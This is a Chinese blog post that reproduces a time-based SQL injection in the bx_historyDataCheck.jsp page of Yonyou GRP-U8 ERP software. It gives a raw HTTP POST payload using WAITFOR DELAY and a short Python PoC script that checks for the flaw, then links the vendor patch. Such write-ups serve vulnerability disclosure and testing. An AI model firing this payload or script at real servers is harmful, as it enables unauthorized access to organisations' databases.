用友GRP-U8 SQL注入漏洞复现

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、产品介绍

        成长型企业平台,以全新URP为平台,应对中型及成长型企业客户群的发展,用友U8为成长型企业提供了互联网应用模式,包括营销服务一体化、完整闭环O2O、供应链协同、设计制造一体化、精益生产、精细管控、人力资源、办公协同、移动应用、大数据分析、社交化协同和云服务,覆盖了企业的全业务。  

二、漏洞描述

        在用友GRP-U8的bx_historyDataCheck jsp 存在SQL注入漏洞,由于用友GRP-U8未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。本次漏洞主要是对查询语句后拼接的入参注入特定变量值,非法获取数据或对数据库服务器产生影响,存在一定的安全隐患。

三、影响版本

用友GRP-U8R10 U8Manager B、C、G 系列产品 < 20230905

四、漏洞复现

1.访问漏洞环境

2.POC (POST)

        POST请求,延时注入


POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host: xxxxxxxxxxxx
User-Agent: Go-http-client/1.1
Content-Length: 84
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=5FF34252A52D49B94A560C18AB894656
Accept-Encoding: gzip

userName=';WAITFOR DELAY '0:0:6'--&class.module.classLoader.DefaultAssertionStatus=

执行poc

用python编写一个poc

import re
import requests

url = 'http://替换部分/u8qx/bx_historyDataCheck.jsp'

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Content-Length': '59',
    'Connection': 'close'
}

data = {
    "userName":"1';WAITFOR%20DELAY%20'0:0:6'--+&ysnd=&historyFlag="
}

response = requests.post(url, headers=headers, data=data)

print('Status Code:', response.status_code)
if response.status_code ==200:
    print('存在用友GRP-U8 SQL注入漏洞,请尽快修复漏洞!!!')
else:
    print('漏洞不存在。')

运行结果如图

 五、修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://security.yonyou.com/#/patchInfo?foreignKey=77e7e13f32754da9a5be93a9bfbb3f4c
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
引用\[1\]: 用友GRP-U8R10行政事业财务管理软件存在任意文件上传漏洞,攻击者可以通过该漏洞获取服务器权限。\[1\]该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载,导致可加载恶意外部文件。最终产生两种后果,一是可以进行SQL注入,执行SQL语句;二是导致命令执行,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。\[3\]因此,用友GRP-U8高校内控管理软件也可能存在类似的漏洞。请及时更新软件版本或采取其他安全措施以防止潜在的攻击。 #### 引用[.reference_title] - *1* [用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用](https://blog.csdn.net/qq_41904294/article/details/129693405)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [用友 GRP-U8 Proxy XXE-SQL注入漏洞](https://blog.csdn.net/weixin_46944519/article/details/127225867)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

故事讲予风听

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值